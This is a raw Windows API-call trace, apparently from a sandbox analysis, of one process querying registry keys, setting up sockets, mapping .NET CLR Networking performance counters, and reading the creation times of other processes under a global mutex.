	[0186.927] GetCurrentProcess () returned 0xffffffff
	[0186.928] GetLastError () returned 0x3f0
	[0186.928] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed6c | out: TokenHandle=0x5e4ed6c*=0x390) returned 1
	[0186.928] GetLastError () returned 0x3f0
	[0187.043] GetCurrentProcess () returned 0xffffffff
	[0187.043] GetLastError () returned 0x3f0
	[0187.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed7c | out: TokenHandle=0x5e4ed7c*=0x394) returned 1
	[0187.043] GetLastError () returned 0x3f0
	[0187.063] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0187.063] GetLastError () returned 0x0
	[0187.063] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
	[0187.063] GetLastError () returned 0x0
	[0187.166] GetCurrentProcess () returned 0xffffffff
	[0187.166] GetLastError () returned 0x3f0
	[0187.166] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed60 | out: TokenHandle=0x5e4ed60*=0x3a0) returned 1
	[0187.166] GetLastError () returned 0x3f0
	[0187.171] GetCurrentProcess () returned 0xffffffff
	[0187.171] GetLastError () returned 0x3f0
	[0187.171] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed70 | out: TokenHandle=0x5e4ed70*=0x3a4) returned 1
	[0187.171] GetLastError () returned 0x3f0
	[0187.181] GetCurrentProcess () returned 0xffffffff
	[0187.181] GetLastError () returned 0x3f0
	[0187.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed34 | out: TokenHandle=0x5e4ed34*=0x3a8) returned 1
	[0187.181] GetLastError () returned 0x3f0
	[0187.196] GetCurrentProcess () returned 0xffffffff
	[0187.196] GetLastError () returned 0x3f0
	[0187.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed44 | out: TokenHandle=0x5e4ed44*=0x3c8) returned 1
	[0187.197] GetLastError () returned 0x3f0
	[0187.201] GetCurrentProcess () returned 0xffffffff
	[0187.201] GetLastError () returned 0x3f0
	[0187.201] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4f038 | out: TokenHandle=0x5e4f038*=0x3ac) returned 1
	[0187.201] GetLastError () returned 0x3f0
	[0187.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e4e098 | out: phkResult=0x5e4e098*=0x3d0) returned 0x0
	[0187.255] RegQueryValueExW (in: hKey=0x3d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5e4e0e0, lpData=0x0, lpcbData=0x5e4e0dc*=0x0 | out: lpType=0x5e4e0e0*=0x1, lpData=0x0, lpcbData=0x5e4e0dc*=0xe) returned 0x0
	[0187.255] RegQueryValueExW (in: hKey=0x3d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5e4e0e0, lpData=0x332a00, lpcbData=0x5e4e0dc*=0xe | out: lpType=0x5e4e0e0*=0x1, lpData="Client", lpcbData=0x5e4e0dc*=0xe) returned 0x0
	[0187.256] RegCloseKey (hKey=0x3d0) returned 0x0
	[0187.298] RasEnumConnectionsW (in: param_1=0x3a12d0, param_2=0x5e4f0b0, param_3=0x5e4f0b4 | out: param_1=0x3a12d0, param_2=0x5e4f0b0, param_3=0x5e4f0b4) returned 0x0
	[0187.764] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x332a00 | out: lpWSAData=0x332a00) returned 0
	[0187.813] GetLastError () returned 0x0
	[0187.822] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x41c
	[0188.247] GetLastError () returned 0x0
	[0188.247] setsockopt (s=0x41c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0188.247] GetLastError () returned 0x273a
	[0188.247] closesocket (s=0x41c) returned 0
	[0188.247] GetLastError () returned 0x0
	[0188.247] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x41c
	[0188.294] GetLastError () returned 0x0
	[0188.294] setsockopt (s=0x41c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0188.294] GetLastError () returned 0x273a
	[0188.294] closesocket (s=0x41c) returned 0
	[0188.386] GetLastError () returned 0x0
	[0188.391] GetCurrentProcess () returned 0xffffffff
	[0188.391] GetLastError () returned 0x3f0
	[0188.392] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ec1c | out: TokenHandle=0x5e4ec1c*=0x41c) returned 1
	[0188.392] GetLastError () returned 0x3f0
	[0188.399] GetCurrentProcess () returned 0xffffffff
	[0188.399] GetLastError () returned 0x3f0
	[0188.399] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ec2c | out: TokenHandle=0x5e4ec2c*=0x420) returned 1
	[0188.399] GetLastError () returned 0x3f0
	[0188.421] GetCurrentProcessId () returned 0x864
	[0188.424] GetComputerNameW (in: lpBuffer=0x3a12d0, nSize=0x2cd389c | out: lpBuffer="XDUWTFONO", nSize=0x2cd389c) returned 1
	[0188.425] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e4ee80 | out: phkResult=0x5e4ee80*=0x424) returned 0x0
	[0188.425] RegQueryValueExW (in: hKey=0x424, lpValueName="Library", lpReserved=0x0, lpType=0x5e4eec8, lpData=0x0, lpcbData=0x5e4eec4*=0x0 | out: lpType=0x5e4eec8*=0x1, lpData=0x0, lpcbData=0x5e4eec4*=0x1c) returned 0x0
	[0188.425] RegQueryValueExW (in: hKey=0x424, lpValueName="Library", lpReserved=0x0, lpType=0x5e4eec8, lpData=0x332a00, lpcbData=0x5e4eec4*=0x1c | out: lpType=0x5e4eec8*=0x1, lpData="netfxperf.dll", lpcbData=0x5e4eec4*=0x1c) returned 0x0
	[0188.425] RegQueryValueExW (in: hKey=0x424, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5e4eec8, lpData=0x0, lpcbData=0x5e4eec4*=0x0 | out: lpType=0x5e4eec8*=0x4, lpData=0x0, lpcbData=0x5e4eec4*=0x4) returned 0x0
	[0188.427] RegQueryValueExW (in: hKey=0x424, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5e4eec8, lpData=0x5e4eeb4, lpcbData=0x5e4eec4*=0x4 | out: lpType=0x5e4eec8*=0x4, lpData=0x5e4eeb4*=0x1, lpcbData=0x5e4eec4*=0x4) returned 0x0
	[0188.427] RegQueryValueExW (in: hKey=0x424, lpValueName="First Counter", lpReserved=0x0, lpType=0x5e4eec8, lpData=0x0, lpcbData=0x5e4eec4*=0x0 | out: lpType=0x5e4eec8*=0x4, lpData=0x0, lpcbData=0x5e4eec4*=0x4) returned 0x0
	[0188.428] RegQueryValueExW (in: hKey=0x424, lpValueName="First Counter", lpReserved=0x0, lpType=0x5e4eec8, lpData=0x5e4eeb4, lpcbData=0x5e4eec4*=0x4 | out: lpType=0x5e4eec8*=0x4, lpData=0x5e4eeb4*=0x137a, lpcbData=0x5e4eec4*=0x4) returned 0x0
	[0188.428] RegCloseKey (hKey=0x424) returned 0x0
	[0188.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e4ee7c | out: phkResult=0x5e4ee7c*=0x424) returned 0x0
	[0188.431] RegQueryValueExW (in: hKey=0x424, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5e4eec4, lpData=0x0, lpcbData=0x5e4eec0*=0x0 | out: lpType=0x5e4eec4*=0x4, lpData=0x0, lpcbData=0x5e4eec0*=0x4) returned 0x0
	[0188.431] RegQueryValueExW (in: hKey=0x424, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5e4eec4, lpData=0x5e4eeb0, lpcbData=0x5e4eec0*=0x4 | out: lpType=0x5e4eec4*=0x4, lpData=0x5e4eeb0*=0x3, lpcbData=0x5e4eec0*=0x4) returned 0x0
	[0188.431] RegQueryValueExW (in: hKey=0x424, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5e4eec4, lpData=0x0, lpcbData=0x5e4eec0*=0x0 | out: lpType=0x5e4eec4*=0x4, lpData=0x0, lpcbData=0x5e4eec0*=0x4) returned 0x0
	[0188.431] RegQueryValueExW (in: hKey=0x424, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5e4eec4, lpData=0x5e4eeb0, lpcbData=0x5e4eec0*=0x4 | out: lpType=0x5e4eec4*=0x4, lpData=0x5e4eeb0*=0x20000, lpcbData=0x5e4eec0*=0x4) returned 0x0
	[0188.431] RegQueryValueExW (in: hKey=0x424, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5e4eec4, lpData=0x0, lpcbData=0x5e4eec0*=0x0 | out: lpType=0x5e4eec4*=0x3, lpData=0x0, lpcbData=0x5e4eec0*=0xaa) returned 0x0
	[0188.431] RegQueryValueExW (in: hKey=0x424, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5e4eec4, lpData=0x2cd5fe0, lpcbData=0x5e4eec0*=0xaa | out: lpType=0x5e4eec4*=0x3, lpData=0x2cd5fe0*, lpcbData=0x5e4eec0*=0xaa) returned 0x0
	[0188.487] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0188.489] GetLastError () returned 0x0
	[0188.492] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x332a30, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0188.493] GetLastError () returned 0x5
	[0188.497] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x42c
	[0188.497] GetLastError () returned 0x5
	[0188.500] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1ce0000
	[0188.502] VirtualQuery (in: lpAddress=0x1ce0000, lpBuffer=0x5e4ee94, dwLength=0x1c | out: lpBuffer=0x5e4ee94*(BaseAddress=0x1ce0000, AllocationBase=0x1ce0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
	[0188.503] GetLastError () returned 0x5
	[0188.503] LocalFree (hMem=0x393498) returned 0x0
	[0188.503] RegCloseKey (hKey=0x424) returned 0x0
	[0188.506] GetVersionExW (in: lpVersionInformation=0x332a18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x332a18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0188.506] GetLastError () returned 0x5
	[0188.507] GetVersionExW (in: lpVersionInformation=0x332a18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x332a18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0188.507] GetLastError () returned 0x5
	[0188.509] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cd6a5c, cbSid=0x5e4ee74 | out: pSid=0x2cd6a5c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee74) returned 1
	[0188.509] GetLastError () returned 0x5
	[0188.514] CreateMutexW (lpMutexAttributes=0x2cd6b94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.514] GetLastError () returned 0x5
	[0188.517] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.517] GetLastError () returned 0x5
	[0188.519] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.534] GetLastError () returned 0x5
	[0188.535] GetCurrentProcessId () returned 0x864
	[0188.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0x430
	[0188.536] GetLastError () returned 0x5
	[0188.539] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4eddc, lpExitTime=0x5e4edd4, lpKernelTime=0x5e4edd4, lpUserTime=0x5e4edd4 | out: lpCreationTime=0x5e4eddc, lpExitTime=0x5e4edd4, lpKernelTime=0x5e4edd4, lpUserTime=0x5e4edd4) returned 1
	[0188.539] GetLastError () returned 0x5
	[0188.540] CloseHandle (hObject=0x430) returned 1
	[0188.541] GetLastError () returned 0x5
	[0188.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb30) returned 0x430
	[0188.541] GetLastError () returned 0x5
	[0188.541] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.541] GetLastError () returned 0x5
	[0188.542] CloseHandle (hObject=0x430) returned 1
	[0188.543] GetLastError () returned 0x5
	[0188.543] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xb30) returned 0x430
	[0188.543] GetLastError () returned 0x5
	[0188.543] GetCurrentProcess () returned 0xffffffff
	[0188.543] GetLastError () returned 0x5
	[0188.543] GetCurrentProcess () returned 0xffffffff
	[0188.543] GetLastError () returned 0x5
	[0188.546] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.546] GetLastError () returned 0x5
	[0188.549] CloseHandle (hObject=0x434) returned 1
	[0188.549] GetLastError () returned 0x5
	[0188.550] CloseHandle (hObject=0x430) returned 1
	[0188.550] GetLastError () returned 0x5
	[0188.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x888) returned 0x430
	[0188.550] GetLastError () returned 0x5
	[0188.550] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.550] GetLastError () returned 0x5
	[0188.550] CloseHandle (hObject=0x430) returned 1
	[0188.550] GetLastError () returned 0x5
	[0188.550] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x888) returned 0x430
	[0188.550] GetLastError () returned 0x5
	[0188.550] GetCurrentProcess () returned 0xffffffff
	[0188.550] GetLastError () returned 0x5
	[0188.551] GetCurrentProcess () returned 0xffffffff
	[0188.551] GetLastError () returned 0x5
	[0188.551] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.551] GetLastError () returned 0x5
	[0188.551] CloseHandle (hObject=0x434) returned 1
	[0188.551] GetLastError () returned 0x5
	[0188.551] CloseHandle (hObject=0x430) returned 1
	[0188.551] GetLastError () returned 0x5
	[0188.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x430
	[0188.551] GetLastError () returned 0x5
	[0188.552] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.552] GetLastError () returned 0x5
	[0188.552] CloseHandle (hObject=0x430) returned 1
	[0188.552] GetLastError () returned 0x5
	[0188.552] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x708) returned 0x430
	[0188.552] GetLastError () returned 0x5
	[0188.552] GetCurrentProcess () returned 0xffffffff
	[0188.552] GetLastError () returned 0x5
	[0188.552] GetCurrentProcess () returned 0xffffffff
	[0188.552] GetLastError () returned 0x5
	[0188.552] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.552] GetLastError () returned 0x5
	[0188.553] CloseHandle (hObject=0x434) returned 1
	[0188.553] GetLastError () returned 0x5
	[0188.553] CloseHandle (hObject=0x430) returned 1
	[0188.553] GetLastError () returned 0x5
	[0188.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x430
	[0188.553] GetLastError () returned 0x5
	[0188.553] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.553] GetLastError () returned 0x5
	[0188.553] CloseHandle (hObject=0x430) returned 1
	[0188.553] GetLastError () returned 0x5
	[0188.553] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x430
	[0188.553] GetLastError () returned 0x5
	[0188.553] GetCurrentProcess () returned 0xffffffff
	[0188.553] GetLastError () returned 0x5
	[0188.553] GetCurrentProcess () returned 0xffffffff
	[0188.553] GetLastError () returned 0x5
	[0188.554] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.554] GetLastError () returned 0x5
	[0188.554] CloseHandle (hObject=0x434) returned 1
	[0188.554] GetLastError () returned 0x5
	[0188.554] CloseHandle (hObject=0x430) returned 1
	[0188.554] GetLastError () returned 0x5
	[0188.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x430
	[0188.554] GetLastError () returned 0x5
	[0188.554] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.554] GetLastError () returned 0x5
	[0188.555] CloseHandle (hObject=0x430) returned 1
	[0188.555] GetLastError () returned 0x5
	[0188.555] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x430
	[0188.555] GetLastError () returned 0x5
	[0188.555] GetCurrentProcess () returned 0xffffffff
	[0188.555] GetLastError () returned 0x5
	[0188.555] GetCurrentProcess () returned 0xffffffff
	[0188.555] GetLastError () returned 0x5
	[0188.555] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.555] GetLastError () returned 0x5
	[0188.555] CloseHandle (hObject=0x434) returned 1
	[0188.556] GetLastError () returned 0x5
	[0188.556] CloseHandle (hObject=0x430) returned 1
	[0188.556] GetLastError () returned 0x5
	[0188.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x430
	[0188.556] GetLastError () returned 0x5
	[0188.556] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.556] GetLastError () returned 0x5
	[0188.556] CloseHandle (hObject=0x430) returned 1
	[0188.556] GetLastError () returned 0x5
	[0188.556] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x430
	[0188.556] GetLastError () returned 0x5
	[0188.556] GetCurrentProcess () returned 0xffffffff
	[0188.557] GetLastError () returned 0x5
	[0188.557] GetCurrentProcess () returned 0xffffffff
	[0188.557] GetLastError () returned 0x5
	[0188.557] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.557] GetLastError () returned 0x5
	[0188.557] CloseHandle (hObject=0x434) returned 1
	[0188.557] GetLastError () returned 0x5
	[0188.557] CloseHandle (hObject=0x430) returned 1
	[0188.557] GetLastError () returned 0x5
	[0188.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x430
	[0188.558] GetLastError () returned 0x5
	[0188.558] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.558] GetLastError () returned 0x5
	[0188.558] CloseHandle (hObject=0x430) returned 1
	[0188.558] GetLastError () returned 0x5
	[0188.558] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x430
	[0188.558] GetLastError () returned 0x5
	[0188.558] GetCurrentProcess () returned 0xffffffff
	[0188.558] GetLastError () returned 0x5
	[0188.558] GetCurrentProcess () returned 0xffffffff
	[0188.558] GetLastError () returned 0x5
	[0188.558] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.559] GetLastError () returned 0x5
	[0188.559] CloseHandle (hObject=0x434) returned 1
	[0188.559] GetLastError () returned 0x5
	[0188.559] CloseHandle (hObject=0x430) returned 1
	[0188.559] GetLastError () returned 0x5
	[0188.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x430
	[0188.559] GetLastError () returned 0x5
	[0188.559] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24 | out: lpCreationTime=0x5e4ee2c, lpExitTime=0x5e4ee24, lpKernelTime=0x5e4ee24, lpUserTime=0x5e4ee24) returned 1
	[0188.559] GetLastError () returned 0x5
	[0188.559] CloseHandle (hObject=0x430) returned 1
	[0188.560] GetLastError () returned 0x5
	[0188.560] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x430
	[0188.560] GetLastError () returned 0x5
	[0188.560] GetCurrentProcess () returned 0xffffffff
	[0188.560] GetLastError () returned 0x5
	[0188.560] GetCurrentProcess () returned 0xffffffff
	[0188.560] GetLastError () returned 0x5
	[0188.560] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5e4ed8c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5e4ed8c*=0x434) returned 1
	[0188.560] GetLastError () returned 0x5
	[0188.560] CloseHandle (hObject=0x434) returned 1
	[0188.560] GetLastError () returned 0x5
	[0188.561] CloseHandle (hObject=0x430) returned 1
	[0188.561] GetLastError () returned 0x5
	[0188.561] ReleaseMutex (hMutex=0x424) returned 1
	[0188.618] GetLastError () returned 0x5
	[0188.618] CloseHandle (hObject=0x424) returned 1
	[0188.636] GetLastError () returned 0x5
	[0188.637] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cd76bc, cbSid=0x5e4ee74 | out: pSid=0x2cd76bc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee74) returned 1
	[0188.637] GetLastError () returned 0x5
	[0188.637] CreateMutexW (lpMutexAttributes=0x2cd77cc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.637] GetLastError () returned 0x0
	[0188.637] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.637] GetLastError () returned 0x0
	[0188.638] ReleaseMutex (hMutex=0x424) returned 1
	[0188.638] GetLastError () returned 0x0
	[0188.638] CloseHandle (hObject=0x424) returned 1
	[0188.638] GetLastError () returned 0x0
	[0188.638] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cd7f44, cbSid=0x5e4ee74 | out: pSid=0x2cd7f44*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee74) returned 1
	[0188.638] GetLastError () returned 0x0
	[0188.639] CreateMutexW (lpMutexAttributes=0x2cd8054, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.639] GetLastError () returned 0x0
	[0188.639] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.639] GetLastError () returned 0x0
	[0188.639] ReleaseMutex (hMutex=0x424) returned 1
	[0188.639] GetLastError () returned 0x0
	[0188.639] CloseHandle (hObject=0x424) returned 1
	[0188.639] GetLastError () returned 0x0
	[0188.640] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cd87dc, cbSid=0x5e4ee74 | out: pSid=0x2cd87dc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee74) returned 1
	[0188.640] GetLastError () returned 0x0
	[0188.640] CreateMutexW (lpMutexAttributes=0x2cd88ec, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.640] GetLastError () returned 0x0
	[0188.640] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.640] GetLastError () returned 0x0
	[0188.641] ReleaseMutex (hMutex=0x424) returned 1
	[0188.641] GetLastError () returned 0x0
	[0188.641] CloseHandle (hObject=0x424) returned 1
	[0188.641] GetLastError () returned 0x0
	[0188.641] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2cd906c, cbSid=0x5e4ee74 | out: pSid=0x2cd906c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5e4ee74) returned 1
	[0188.641] GetLastError () returned 0x0
	[0188.642] CreateMutexW (lpMutexAttributes=0x2cd917c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.642] GetLastError () returned 0x0
	[0188.642] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.642] GetLastError () returned 0x0
	[0188.642] ReleaseMutex (hMutex=0x424) returned 1
	[0188.642] GetLastError () returned 0x0
	[0188.642] CloseHandle (hObject=0x424) returned 1
	[0188.642] GetLastError () returned 0x0
